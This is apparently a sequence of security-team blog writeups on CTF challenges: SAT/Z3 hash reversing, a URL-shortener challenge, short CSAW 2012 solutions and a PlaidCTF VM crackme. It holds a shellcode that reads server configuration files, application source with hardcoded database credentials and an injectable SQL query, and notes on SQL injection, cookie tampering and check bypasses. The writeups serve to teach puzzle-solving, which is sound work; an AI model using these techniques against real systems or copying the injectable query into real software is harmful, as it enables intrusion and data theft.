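from itertools import product

# Sanity check of the 1-bit full adder equations against arithmetic.
def full_adder_sum(a, b, cin):
    return ((not a and b and not cin) or (a and not b and not cin)
            or (not a and not b and cin) or (a and b and cin))

def full_adder_cout(a, b, cin):
    return (a and b) or (a and cin) or (b and cin)

# S == A xor B xor Cin, Cout == majority(A, B, Cin), for all 8 inputs.
assert all(bool(full_adder_sum(a, b, c)) == bool(a ^ b ^ c)
           for a, b, c in product([0, 1], repeat=3))
assert all(bool(full_adder_cout(a, b, c)) == (a + b + c >= 2)
           for a, b, c in product([0, 1], repeat=3))
```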

You can then translate these formulas to CNF to describe a 1 bit full adder for the SAT solver. However doing that manually is a lot of work (especially if you're like me and never had proper training in CNF and how to convert formulas to that form), so we're just going to use the boolean algebra package from Sage to do it automatically:

```
sage: import sage.logic.propcalc as propcalc
sage: f = propcalc.formula("d <-> (~a&b&~c | a&~b&~c | ~a&~b&c | a&b&c)")
sage: f.convert_cnf_table()
sage: f
(d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c)
sage: f = propcalc.formula("d <-> (a&b | a&c | b&c)")
sage: f.convert_cnf_table()
sage: f
(d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c)
```

We can then convert the CNF clauses Sage gives us directly to Python:

```python
def cnf_1bitadder(gen, a, b, c):
    res = gen.new_var()
    res_carry = gen.new_var()

    # (d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c)
    gen.add(res_carry, a, -b, -c)
    gen.add(res_carry, -a, b, -c)
    gen.add(res_carry, -a, -b, c)
    gen.add(res_carry, -a, -b, -c)
    gen.add(-res_carry, a, b, c)
    gen.add(-res_carry, a, b, -c)
    gen.add(-res_carry, a, -b, c)
    gen.add(-res_carry, -a, b, c)

    # (d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c)
    gen.add(res, a, b, -c)
    gen.add(res, a, -b, c)
    gen.add(res, -a, b, c)
    gen.add(res, -a, -b, -c)
    gen.add(-res, a, b, c)
    gen.add(-res, a, -b, -c)
    gen.add(-res, -a, b, -c)
    gen.add(-res, -a, -b, c)

    return res, res_carry
```

Probably not the nicest way to do it, but most likely one of the simplest ways. We can then use that one bit adder to make a 32 bit adder:

```python
def cnf_add(gen, a, b):
    carry = gen.new_var()
    gen.add(-carry)  # The first carry is always 0

    out = []
    for (a, b) in zip(a, b):
        res, carry = cnf_1bitadder(gen, a, b, carry)
        out.append(res)
    return out
```
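The `gen` helper used in these snippets is never shown in the article; it just numbers fresh variables and collects clauses for DIMACS output. Here is a hypothetical minimal version of such a clause generator (the real one may differ):

```python
class ClauseGen:
    """Minimal sketch of a DIMACS clause collector: new_var() allocates a
    fresh variable number, add() records one clause (positive literal = the
    variable, negative literal = its negation)."""

    def __init__(self):
        self.nvars = 0
        self.clauses = []

    def new_var(self):
        self.nvars += 1
        return self.nvars

    def add(self, *literals):
        self.clauses.append(literals)

    def dimacs(self):
        # DIMACS CNF: a "p cnf <vars> <clauses>" header, then one
        # 0-terminated line per clause.
        lines = ["p cnf %d %d" % (self.nvars, len(self.clauses))]
        for clause in self.clauses:
            lines.append(" ".join(str(l) for l in clause) + " 0")
        return "\n".join(lines)

gen = ClauseGen()
x, y = gen.new_var(), gen.new_var()
gen.add(x, -y)          # clause: x OR NOT y
print(gen.dimacs())
```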

With this we can finally implement our checksum!

```python
sum = cnf_add(gen, a, cnf_add(gen, b, cnf_add(gen, c, d)))
sub = cnf_sub(gen, cnf_xor(gen, a, b), cnf_xor(gen, c, d))
cksum = cnf_xor(gen, cnf_rotl(gen, sub, 17), sum)
cnf_equal(gen, cksum, 0xa6779036)
```

Running our Python program generates a DIMACS file with 17061 variables and 19365 clauses. CryptoMiniSat can find a set of values that satisfy the clauses in less than 0.05s on my Sandy Bridge based laptop. For example, a = 0xe9e708e1, b = 0xf7e4c55a, c = 0x85e77db9 and d = 0x5467bd3c pass both the checksum and the hash and are considered a valid solution.
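The checksum part of that solution can be double-checked with plain Python integer arithmetic:

```python
# Recompute the crackme checksum for the solution found by CryptoMiniSat.
MASK = 0xffffffff

def rotl32(n, sa):
    # 32-bit left rotation on plain Python integers.
    return ((n << sa) | (n >> (32 - sa))) & MASK

a, b, c, d = 0xe9e708e1, 0xf7e4c55a, 0x85e77db9, 0x5467bd3c
cksum = rotl32(((a ^ b) - (c ^ d)) & MASK, 17) ^ ((a + b + c + d) & MASK)
print(hex(cksum))  # → 0xa6779036
```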

## Using Z3 to make things easier

At first I planned to stop there: I had a proof that the crackme was still doable even with that broken hash algorithm. However when I explained what I was doing, a friend of mine told me about SMT solvers. One of their characteristics is that they can work on boolean algebra, but also functions and linear combinations of integer and real variables. For example, you can use an SMT solver for this kind of problem:

$$x^2 + y^2 < 1, 2x + y > 1$$
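This example system is satisfiable, and a witness a solver might return is easy to check by hand:

```python
# x = y = 0.5 satisfies both constraints of the example system above:
# 0.25 + 0.25 < 1 and 1.0 + 0.5 > 1.
x, y = 0.5, 0.5
print(x**2 + y**2 < 1, 2*x + y > 1)  # → True True
```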

I looked a bit at recent SMT solvers to see if it could make cracking my hash easier. I used the Z3 theorem prover from Microsoft Research, which is not open source but has Linux binaries and nice interfaces for programming languages like Python and OCaml. Z3 can work on real numbers, integers, functions but also bit vectors, and has a nice API to do so.

As expected, things are a lot easier when your solver has native support for your problem's natural representation (here, bit vectors and unsigned integers). The code cracking the hash using Z3 is a fair bit slower (still less than 5s) but also much shorter and easier to understand:

```python
from z3 import *

# SCRAMBLE_TABLE, XOR_TABLE and ROT_TABLE are the constant tables
# extracted from the crackme (definitions omitted here).

def rotl32(n, sa):
    return (n << sa) | LShR(n, 32 - sa)

def hash(a, b, c, d):
    out = []
    for i, n in enumerate((a, b, c, d)):
        nn = BitVecVal(0, 32)
        for j in range(32):
            nn |= (LShR(n, SCRAMBLE_TABLE[i][j]) & 1) << j
        nn ^= XOR_TABLE[i]
        out.append(nn)
    out[0] = rotl32(out[0], ROT_TABLE[0])
    out[1] = rotl32(out[1], ROT_TABLE[1])
    out[2] = rotl32(out[2], ROT_TABLE[2])
    out[3] = rotl32(out[3], ROT_TABLE[3])
    return out

if __name__ == '__main__':
    s = Solver()
    a = BitVec('a', 32)
    b = BitVec('b', 32)
    c = BitVec('c', 32)
    d = BitVec('d', 32)

    checksum = rotl32((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)
    a ^= c
    b ^= d
    for i in range(128):
        a, b, c, d = hash(a, b, c, d)

    solve(checksum == 0xa6779036,
          a == 0x8e2c4c74, b == 0xa6c27e2a,
          c == 0xf5e15d3d, d == 0x7bebc2ba)
```

Here the shorter code is mostly due to the fact that I had no nice API for CryptoMiniSat to translate arithmetic operations to CNF. SMT solvers do not provide that much of an edge over SAT solvers for this kind of problem: they shine a lot more as soon as you introduce functions or real numbers that can't easily be expressed as bit vectors.

## Conclusion

Sometimes, when simple bruteforce does not work, you have to go a bit further to reverse a hash algorithm, and using a SAT solver enables you to do just that. The problem is not always easy to formalize, especially when you start using complex operations that can't easily be translated, but using SAT solvers for cryptography is a very interesting technique: it has already proven itself many times in the past, and it will probably become more and more useful as SAT solvers and ways to formalize hard problems (like AES) evolve.

• # NDH2K12 Prequals: shortner writeup

Written by Pierre Bourdon
2012-03-25 00:42:00

```
From: Jessica
To: LSE
Subject: New email from our contact
Attachments: executable2.ndh

Thank you again for your help, our technical staff has a pretty good
overview of the new device designed by Sciteek. Your account will be
credited with $500. You did work hard enough to impress me, your help
is still more than welcome, you will get nice rewards. Our anonymous
guy managed to get access to another bunch of files. Here is one of
his emails:

---
Hi there, see attached file for more information. It was found on
http://sci.nuitduhack.com/EgZ8sv12.
---

Maybe you can get further than him by exploiting this website. We also
need to get as much information as possible about the file itself. If
you succeed, you will be rewarded with $2500 for the ndh file and
$1000 for the website. Please use "Sciteek shortener" and "strange
binary file #2" titles.

Regards,
Jessica.
```

Let's ignore the file at the given URL (this is for another writeup!) and work on the URL shortener website mentioned in this email: sci.nuitduhack.com. After experimenting a bit, we noticed several interesting points:

• The short URL is apparently random, and trying to access a non-existent one gives us "An unknown error occurred. Please try later."
• If no short URL is provided, the following error message is displayed: "No URL alias found in URL"

We looked at the web server information to get more data on where to start attacking. This is the HTTP response to an invalid short URL:

```
HTTP/1.1 200 WSGI-GENERATED
Server: nginx
Date: Sat, 24 Mar 2012 21:40:23 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
```

The WSGI-GENERATED string informs us that the website is coded in Python, using the WSGI interface to communicate with the web server.
Also, even though nginx is mentioned in the HTTP response, sending some erroneous queries shows us that nginx is in fact only used as a reverse proxy in front of an Apache 2 server:

```
$ curl -vvv http://sci.nuitduhack.com/%
* About to connect() to sci.nuitduhack.com port 80 (#0)
*   Trying 176.34.97.189...
* connected
* Connected to sci.nuitduhack.com (176.34.97.189) port 80 (#0)
> GET /% HTTP/1.1
> User-Agent: curl/7.24.0 (x86_64-unknown-linux-gnu) libcurl/7.24.0 OpenSSL/1.0.0g zlib/1.2.6 libssh2/1.3.0
> Host: sci.nuitduhack.com
> Accept: */*
>
< HTTP/1.1 400 Bad Request
< Server: nginx
< Date: Sat, 24 Mar 2012 21:42:06 GMT
< Content-Type: text/html; charset=iso-8859-1
< Content-Length: 226
< Connection: keep-alive
< Vary: Accept-Encoding
<
400 Bad Request

Bad Request

Your browser sent a request that this server could not understand.

* Connection #0 to host sci.nuitduhack.com left intact
```

We knew that we could use the server running on port 4004 to access the filesystem through a shellcode running in the VM. We used that to confirm that an Apache 2 server was installed and running on the server, using the following shellcode:

```
    MOVB R0, #0x2
    MOVL R1, :filename
    MOVB R2, #0x0
    SYSCALL             ; open(filename, O_RDONLY)
    MOV R7, R0

.label :loop
    MOVB R0, #0x03
    MOV R1, R7
    MOV R2, SP
    MOVB R3, #0x01
    SYSCALL             ; read(fd, sp, 1)
    TEST R0, R0
    JNZ :read_ok
    END

.label :read_ok
    MOVB R0, #0x04
    MOVB R1, #0x01
    MOV R2, SP
    MOVB R3, #0x01
    SYSCALL             ; write(stdout, sp, 1)
    JMPS :loop

.label :filename
.ascii "/etc/apache2/apache2.conf"
```

Using this shellcode we were able to read /etc/apache2/apache2.conf, as well as the default vhost (/etc/apache2/sites-enabled/default) and the Apache 2 PID file (/var/run/apache2.pid). We then tried to access the URL shortener vhost. After a few tries and a lot of luck, we found out that it was named shortner instead of shortener. Here is its virtual host configuration:

```apache
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    ServerName sci.nuitduhack.com

    DocumentRoot /var/www/shortner
    <Directory />
        Options FollowSymLinks
        AllowOverride None
    </Directory>

    WSGIScriptAlias / /var/www/shortner/app.py

    <Directory /var/www/shortner>
        Options FollowSymLinks
        AllowOverride None
        Order allow,deny
        Allow from All
    </Directory>
</VirtualHost>
```

We then read the application source code, and after a few hops we got this file which handles the HTTP queries:

```python
from apwal import *
from apwal.core.exceptions import ExternalRedirect
from apwal.http import HttpResponse, HttpResponseRedirect
from MySQLdb import *

user = 'shortner'
passwd = 'TzuFsms8'
db = 'shortner'

class ErrorOccurred(Exception):
    def __init__(self):
        Exception.__init__(self)

class Shortner:
    def __init__(self):
        # connect to our database
        self.conn = connect(host='localhost', user=user,
                            passwd=passwd, db=db, port=3306)

    def getUrlFromAlias(self, alias):
        cur = self.conn.cursor()
        cur.execute("SELECT url FROM shortner WHERE alias='%s'" % alias)
        res = cur.fetchone()
        cur.close()
        if res:
            return res[0]
        return None

    def close(self):
        self.conn.close()

@main
class URLShortner(Pluggable):
    def getRealUrlFromAlias(self, alias):
        s = Shortner()
        url = s.getUrlFromAlias(alias)
        s.close()
        return url

    def error(self):
        return HttpResponse('An unknown error occurred. Please try later.')

    @bind('/{id:(.+)}?')
    def index(self, urlparams=None):
        if urlparams and ('id' in urlparams) and urlparams['id']:
            if urlparams['id'] == 'mMVzJ8Qj/flag.txt':
                return HttpResponse('b92b5e7094c7ffb35a526c9eaa6fab0a')
            elif urlparams['id'] == 'EgZ8sv12':
                return HttpResponse(
                    open('/var/www/shortner/crackme2.ndh', 'rb').read()
                )
            else:
                try:
                    if 'BENCHMARK' in urlparams['id'].upper():
                        raise ErrorOccurred()
                    r = self.getRealUrlFromAlias(urlparams['id'])
                    if r:
                        return HttpResponseRedirect(r)
                    raise ErrorOccurred()
                except ProgrammingError, e:
                    return self.error()
                except ErrorOccurred, e:
                    return self.error()
        else:
            return HttpResponse(
                'Sciteek URL shortener'
                '<br/>No URL alias found in URL !'
            )
```

According to this code, we should have been able to inject SQL through the short URL: the id parameter is not escaped before being interpolated with % into the query (a correct way to do it would have been to remove the manual interpolation and let the Python MySQL client library do the escaping itself). But there is no need for that: the flag is already present in the source code: b92b5e7094c7ffb35a526c9eaa6fab0a.
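For illustration, here is what the parameterized-query fix looks like, sketched with Python's built-in sqlite3 module (placeholder syntax is `?` instead of MySQLdb's `%s`; the table contents are made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE shortner (alias TEXT, url TEXT)")
conn.execute("INSERT INTO shortner VALUES ('abc', 'http://example.com')")

def get_url_from_alias(conn, alias):
    # The driver escapes the bound value itself, so a quote in the alias
    # cannot break out of the string literal.
    cur = conn.execute("SELECT url FROM shortner WHERE alias = ?", (alias,))
    row = cur.fetchone()
    return row[0] if row else None

print(get_url_from_alias(conn, "abc"))           # → http://example.com
print(get_url_from_alias(conn, "' OR '1'='1"))   # → None (no injection)
```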

LSE blog: teaching you how to pwn web challenges without doing dirty web exploits!

• # CSAW CTF 2012: for200-500/net100-200/re100-400/web100-300/web600 writeups

Written by Pierre Bourdon
2012-10-01 00:00:00

This article collects writeups for several challenges which did not deserve a full article.

## for200 (1)

When you decode the chunks of the PNG file individually only one has a CRC error. It contains text which is the key to submit.

## for200 (2)

When you decode the chunks of the PNG file individually only one text chunk has no CRC error. It contains text which is the key to submit.
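Both of these come down to walking the PNG chunk list and recomputing each CRC. A sketch of such a checker, relying only on the standard PNG chunk layout (4-byte big-endian length, 4-byte type, data, then a CRC-32 over type + data):

```python
import struct
import zlib

def png_chunk_crcs(data):
    """Return the types of PNG chunks whose stored CRC does not match the
    CRC-32 recomputed over the chunk type + data."""
    bad = []
    off = 8  # skip the 8-byte PNG signature
    while off + 12 <= len(data):
        (length,) = struct.unpack(">I", data[off:off + 4])
        ctype = data[off + 4:off + 8]
        body = data[off + 8:off + 8 + length]
        (crc,) = struct.unpack(">I", data[off + 8 + length:off + 12 + length])
        if zlib.crc32(ctype + body) & 0xffffffff != crc:
            bad.append(ctype.decode("ascii", "replace"))
        off += 12 + length
    return bad

# Demo on a made-up file: one good chunk, one with a corrupted CRC.
def chunk(ctype, body, crc_delta=0):
    crc = (zlib.crc32(ctype + body) + crc_delta) & 0xffffffff
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

png = b"\x89PNG\r\n\x1a\n" + chunk(b"IDAT", b"ok") + chunk(b"tEXt", b"hidden", crc_delta=1)
print(png_chunk_crcs(png))  # → ['tEXt']
```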

## for500

strings

## net100

Open with Wireshark, "Follow TCP Stream" and notice a password being sent to a telnet server. This is the key.

## net200

Find the POST request to a <form> on the New York bar website. The text sent with that form contains the key.

## re100

Open the executable with IDA, notice a function that does c XOR 0xFF on every byte of a string, locate the string, apply the xor, get the key.
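The re100 decryption is trivial to reproduce; the string below is a made-up stand-in for the one in the binary:

```python
def xor_ff(data):
    # Byte-wise XOR with 0xff; applying it twice gives back the input.
    return bytes(b ^ 0xff for b in data)

encrypted = xor_ff(b"key{example}")  # hypothetical encrypted string
print(xor_ff(encrypted))  # → b'key{example}'
```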

## re200

Open the executable with Reflector, notice a function that does a XOR once again, reverse the operation, get the key.

## re300

A bit more complicated this time: the decryption function needs a key, and the only thing we know is that the MD5 of the key is ff97a9fdede09eaf6e1c8ec9f6a61dd5. A Google search tells us that this is MD5(Intel). This is still not the final key: the program uses it to decrypt a buffer using AES. Doing the same gives us the key to submit.
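The first step (recognizing the digest) can be reproduced with hashlib:

```python
import hashlib

# The hardcoded digest from the binary is MD5 of the string "Intel",
# which is then used as the AES key for the second stage.
print(hashlib.md5(b"Intel").hexdigest())  # → ff97a9fdede09eaf6e1c8ec9f6a61dd5
```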

## re400

Open the binary with IDA, notice a decrypt function that does NOT c, locate the string, apply the NOT, get the key.

## web100

The auth is done through a cookie. Modify it (set username to admin), done.

## web200

The SQL query allows us to inject something mysqli_real_escape'd in a LIKE clause, including % and _. We can use that to select multiple users and have one matching the $auth condition (valid password, we register him) and one matching the $admin condition (username == Administrator).
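To see why escaping alone does not help here, the wildcard trick can be shown with a self-contained example (sqlite3 stands in for MySQL — in both, LIKE is case-insensitive for ASCII by default — and the table is made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.executemany("INSERT INTO users VALUES (?)",
                 [("Administrator",), ("attacker",)])

# Escaping quotes does not neutralize LIKE wildcards: a registered name
# like 'a%' contains no quote to escape, yet still matches every name
# starting with 'a' -- including the Administrator row.
rows = conn.execute("SELECT name FROM users WHERE name LIKE 'a%'").fetchall()
print(sorted(r[0] for r in rows))  # → ['Administrator', 'attacker']
```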

## web300

There is an SQL injection on the horses.php page. You can't normally use the select or union keywords (blacklisted), but if there is an equal sign before the keyword in the request it somehow works. From there we listed the tables in INFORMATION_SCHEMA, found a sessions table containing a session for the admin user, and used it to get the key. This was not the way the author expected people to solve the challenge, and this bug was fixed during the CTF.

## web600

In PHP, strcmp/strcasecmp called with an array argument fails and returns 0. We can use that to bypass the check and get the key to be printed.

• # PlaidCTF 2012 "simple" writeup

Written by Pierre Bourdon
2012-04-30 13:05:00

simple is a binary that waits for a string on stdin and returns whether the input was the valid key or not. It does that in a very interesting way: there are only 112 bytes of executable x86 code in this 45K binary. After a bit of static analysis in IDA we found out that these 112 bytes implement a common One Instruction Set Computer virtual machine for the subleq architecture with two very simple twists.

A subleq computer works in a very simple way: only one instruction can be executed: subleq a, b, c (with a, b and c three addresses). This instruction computes *b = *b - *a then jumps to c if *b <= 0.
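A subleq machine is small enough to sketch in a few lines of Python. This is a generic illustration, not the crackme's VM (which, as described below, adds read/write syscalls for negative addresses); the halting convention here is made up for the sketch:

```python
def subleq_run(mem, pc=0, max_steps=10000):
    # One instruction type: subleq a, b, c  =>  mem[b] -= mem[a], then
    # jump to c if the result is <= 0, else fall through to pc + 3.
    # Halting convention for this sketch: a negative 'a' field stops the VM.
    for _ in range(max_steps):
        a, b, c = mem[pc], mem[pc + 1], mem[pc + 2]
        if a < 0:
            break
        mem[b] -= mem[a]
        pc = c if mem[b] <= 0 else pc + 3
    return mem

# Single instruction at address 0: mem[7] -= mem[6] (4 - 10 = -6 <= 0),
# so it jumps to address 3, whose 'a' field (-1) halts the machine.
mem = [6, 7, 3, -1, 0, 0, 10, 4]
print(subleq_run(mem)[7])  # → -6
```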

The binary starts by loading 0x323ac into the esp register, then for each iteration of the loop pops 3 values from the stack. This is the "fetch" stage of the virtual machine. After that, a normal subleq computer would simply execute a subtraction and a conditional jump. Here, the VM starts by checking if a is an invalid address (less than 0). If it is, it executes a read syscall to read a single character to *b. Then, it checks if b is an invalid address. If it is, it executes a write syscall to write a single character from *a. If both addresses are valid, it executes a standard subleq.

We started to reverse the whole bytecode for that virtual machine, but reversing something made of several thousand identical instructions is really hard, and we weren't able to find anything interesting through static analysis.

We then tried to combine static and dynamic analysis by tracing the bytecode to see which instructions were executed and in which order. Using gdb and breaking on the first instruction of the VM loop, it is easy to get the address of the current instruction. When reading the traces we noticed that the bytecode was (obviously) doing loops: to read characters until a newline, but also probably to check whether the input string is valid. That means we can count how many loop iterations were performed for our input by counting how many instructions were executed. This is basically a timing attack applied to a virtual machine.

We used this to bruteforce the input string one character at a time using the charset [a-zA-Z0-9_-]. For each character added to the input we counted the number of instructions the VM executed and noticed that this number varied slightly:

```
trying key 'h'... 2997
trying key 'i'... 2997
trying key 'j'... 2997
trying key 'k'... 2997
trying key 'l'... 2977
trying key 'm'... 2993
trying key 'n'... 2993
trying key 'o'... 2993
trying key 'p'... 2993
```

The character l had a lower count, and every character tried after it also had a slightly lower count than the characters tried before it. We assumed this was because l was a valid first character. We then bruteforced all the other characters the same way before getting to the final solution of this problem:

```
trying key 'l3ss_1s_m0r3z'... 12309
trying key 'l3ss_1s_m0r3_'... 12309
trying key 'l3ss_1s_m0r3-'... 12309
trying key 'l3ss_1s_m0r3!'... 14559
trying key 'l3ss_1s_m0r30'... 12309
trying key 'l3ss_1s_m0r31'... 12309
trying key 'l3ss_1s_m0r32'... 12309

$ ./simple
l3ss_1s_m0r3!
Key: l3ss_1s_m0r3!
```

Here is the script we used to bruteforce the key character by character:

```sh
#! /bin/sh

current_guess="$1"
charset="a b c d e f g h i j k l m n o p q r s t u v w x y z"
charset="$charset _ - ! 0 1 2 3 4 5 6 7 8 9"

# Simple GDB script: disable the paging with "set height 0", then define a
# recursive function which prints "instr" and continues to the next breakpoint.
# GDB has a recursion limit so we have to execute "countinstrs" several times :/
cat > gdbscript <<EOF
...
EOF

for c in $charset; do
    guess="$current_guess$c"
    echo "$guess" > guess
    echo -n "trying key '$guess'... "
    gdb ./simple < gdbscript 2>&1 \
        | grep '^\$.*= "instr"$' \
        | tail -1 \
        | cut -d ' ' -f 1 \
        | cut -c 2-
done
```